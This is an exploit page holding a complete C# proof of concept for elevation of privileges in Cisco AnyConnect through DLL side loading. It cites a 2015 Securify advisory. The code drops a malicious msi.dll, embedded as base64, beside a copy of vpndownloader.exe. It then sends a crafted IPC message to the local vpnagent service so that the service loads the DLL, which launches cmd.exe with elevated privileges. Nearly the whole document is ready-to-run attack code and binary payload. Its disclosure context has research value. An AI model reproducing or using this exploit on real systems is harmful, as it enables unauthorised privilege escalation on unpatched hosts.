Exploit

 

Cisco AnyConnect elevation of privileges via DLL side loading

AnyConnectEoP.cs:

/*   Cisco AnyConnect elevation of privileges via DLL side-loading - proof of concept
   Yorick Koster, June 2015
   https://securify.nl/advisory/SFY20150601/cisco_anyconnect_elevation_of_privileges_via_dll_side_loading.html
   based on http://expertmiami.blogspot.com/2015/06/cisco-anyconnect-secure-mobility-client.html
*/
using System;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;
using Microsoft.Win32;
using System.Threading;

namespace AnyConnectEoP
{
    class AnyConnectEoP
    {
       static void Main(string[] args)
       {
            try
            {
                byte[] bytes = new byte[1024];
                byte[] msg = new byte[0];
                int offset = 0;
                int length = 0;
                String vpndownloader = ((String)Registry.GetValue(
                  @"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vpnagent", "ImagePath",
                  @"C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\" +
                  "vpnagent.exe")).Replace("\"", "").Replace("vpnagent", "vpndownloader");
                String path = Path.GetTempPath() + @"vpndownloader.exe";
                String desktop = @"WinSta0\Default";

                FileStream theDll = File.Create(Path.GetTempPath() + @"msi.dll");
                theDll.Write(MSI_DLL, 0, MSI_DLL.Length);
                theDll.Close();
                File.Copy(vpndownloader, path, true);

                length = 10 + path.Length + desktop.Length;
                msg = new byte[length + 26];
                msg[0] = 0x4f;
                msg[1] = 0x43;
                msg[2] = 0x53;
                msg[3] = 0x43;
                msg[4] = 0x1a;
                msg[5] = 0x00;
                msg[6] = (byte)(length & 0xFF);
                msg[7] = (byte)((length >> 8) & 0xFF);
                offset = 8;
                Buffer.BlockCopy(Guid.NewGuid().ToByteArray(), 0, msg, offset, 16);
                offset += 16;
                msg[offset] = 0x01;
                msg[offset + 1] = 0x02;
                msg[offset + 2] = 0x00;
                msg[offset + 3] = 0x01;
                msg[offset + 4] = 0x00;
                msg[offset + 5] = (byte)((path.Length & 0xFF) + 1);
                offset += 6;
                Buffer.BlockCopy(Encoding.ASCII.GetBytes(path), 0, msg, offset, path.Length);
                offset += path.Length;
                msg[offset] = 0x00;
                msg[offset + 1] = 0x00;
                msg[offset + 2] = 0x04;
                msg[offset + 3] = 0x00;
                msg[offset + 4] = (byte)((desktop.Length & 0xFF) + 1);
                offset += 5;
                Buffer.BlockCopy(Encoding.ASCII.GetBytes(desktop), 0, msg, offset, desktop.Length);
                offset += desktop.Length;
                msg[offset] = 0x00;

                IPEndPoint localhost = new IPEndPoint(IPAddress.Parse("127.0.0.1"), 62522);
                Socket sender = new Socket(AddressFamily.InterNetwork, SocketType.Stream,
                  ProtocolType.Tcp);
                sender.Connect(localhost);
                int bytesSent = sender.Send(msg);
                int bytesRec = sender.Receive(bytes);
                sender.Shutdown(SocketShutdown.Both);
                sender.Close();

                Thread.Sleep(5000);
                File.Delete(path);
                File.Delete(Path.GetTempPath() + @"msi.dll");
            }
            catch(Exception e)
            {
                Console.WriteLine(e.ToString());
                Console.WriteLine("Press any key...");
                Console.ReadKey();
            }
       }

       private static byte[] MSI_DLL = Convert.FromBase64String(
         "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" +
         "ZAAuAGUAeABlAAAAAAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwABDgIQAQAQAAAFJTRFP2OW3x" +
         "wkdMS5Eml+NNIIV6AQAAAEM6XFVzZXJzXFlvcmlja1xEb2N1bWVudHNcVmlzdWFs" +
         "IFN0dWRpbyAyMDEzXFByb2plY3RzXERsbEluamVjdFxSZWxlYXNlXERsbEluamVj" +
         "dC5wZGIAAAAAAAAADgAAAA4AAAABAAAAAAAAAAAAAAD5GAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAD+////AAAAAND///8AAAAA/v///wAAAAAXFAAQAAAAAOITABD2EwAQ" +
         "/v///wAAAADY////AAAAAP7///9JFgAQXBYAEAAAAAD+////AAAAAMz///8AAAAA" +
         "/v///wAAAACKFwAQmCIAAAAAAAAAAAAAGiMAAAAgAADAIgAAAAAAAAAAAADAIwAA" +
         "KCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCMAAMQkAACuJAAAlCQAAHgkAABkJAAA" +
         "VCQAAEQkAADaJAAAAAAAAKgjAADOIwAA1iMAAI4jAADuIwAA/CMAAAYkAAAqJAAA" +
         "eCMAAGojAABeIwAAUCMAAEgjAAA6IwAAKCMAAOAjAAD0JAAAAAAAANsAQ3JlYXRl" +
         "UHJvY2Vzc1cAAEtFUk5FTDMyLmRsbAAAbwFfX0NwcFhjcHRGaWx0ZXIAFwJfYW1z" +
         "Z19leGl0AACDBmZyZWUAAKUDX21hbGxvY19jcnQADANfaW5pdHRlcm0ADQNfaW5p" +
         "dHRlcm1fZQBQAl9jcnRfZGVidWdnZXJfaG9vawAArAFfX2NydFVuaGFuZGxlZEV4" +
         "Y2VwdGlvbgCrAV9fY3J0VGVybWluYXRlUHJvY2VzcwBNU1ZDUjEyMC5kbGwAAJQD" +
         "X2xvY2sABAVfdW5sb2NrAC4CX2NhbGxvY19jcnQArgFfX2RsbG9uZXhpdAA6BF9v" +
         "bmV4aXQAjAFfX2NsZWFuX3R5cGVfaW5mb19uYW1lc19pbnRlcm5hbAAAegJfZXhj" +
         "ZXB0X2hhbmRsZXI0X2NvbW1vbgAhAUVuY29kZVBvaW50ZXIA/gBEZWNvZGVQb2lu" +
         "dGVyAGcDSXNEZWJ1Z2dlclByZXNlbnQAbQNJc1Byb2Nlc3NvckZlYXR1cmVQcmVz" +
         "ZW50AC0EUXVlcnlQZXJmb3JtYW5jZUNvdW50ZXIACgJHZXRDdXJyZW50UHJvY2Vz" +
         "c0lkAA4CR2V0Q3VycmVudFRocmVhZElkAADWAkdldFN5c3RlbVRpbWVBc0ZpbGVU" +
         "aW1lAOoGbWVtc2V0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABO5kC7sRm/RAAAAAAAAAAA" +
         "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAYAAAAGAAAgAAAAAAAAAAA" +
         "AAAAAAAAAQACAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAJBAAASAAAAGBAAAB9AQAA" +
         "AAAAAAAAAAAAAAAAAAAAADw/eG1sIHZlcnNpb249JzEuMCcgZW5jb2Rpbmc9J1VU" +
         "Ri04JyBzdGFuZGFsb25lPSd5ZXMnPz4NCjxhc3NlbWJseSB4bWxucz0ndXJuOnNj" +
         "aGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjEnIG1hbmlmZXN0VmVyc2lvbj0nMS4w" +
         "Jz4NCiAgPHRydXN0SW5mbyB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNv" +
         "bTphc20udjMiPg0KICAgIDxzZWN1cml0eT4NCiAgICAgIDxyZXF1ZXN0ZWRQcml2" +
         "aWxlZ2VzPg0KICAgICAgICA8cmVxdWVzdGVkRXhlY3V0aW9uTGV2ZWwgbGV2ZWw9" +
         "J2FzSW52b2tlcicgdWlBY2Nlc3M9J2ZhbHNlJyAvPg0KICAgICAgPC9yZXF1ZXN0" +
         "ZWRQcml2aWxlZ2VzPg0KICAgIDwvc2VjdXJpdHk+DQogIDwvdHJ1c3RJbmZvPg0K" +
         "PC9hc3NlbWJseT4NCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "ABAAAAwBAAAHMEswUTB/MJQwnjCjMKgwvjDKMOsw+TD+MC0xQzFJMVwxYjF8MYgx" +
         "kTGbMaExqTHZMeEx5jHrMfAx9jEoMkgyWzJgMmYyejJ/MosymjKiMrkyvzL1MhAz" +
         "HTMxM5szzTMcNCo0MTRENHw0gjSINI40lDSaNKE0qDSvNLY0vTTENMs00zTbNOM0" +
         "7zT4NP00AzUNNRc1JzU3NUc1UDVgNWY1xjXLNd01+zUPNhU2szbENs821DbZNvA2" +
         "/zYFNxg3LTc4N043aDdyN7o31TfhN/A3+TcGODU4PThKOE84ajhvOIo4kDiVOKE4" +
         "vjgJOQ45HjkkOSo5MDk2OTw5QjlIOU45VDkAAAAgAAAgAAAAfDCAMMww0DBMMVAx" +
         "EDIYMhwyNDI4MlgyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=");
    }
}

download

Work with us →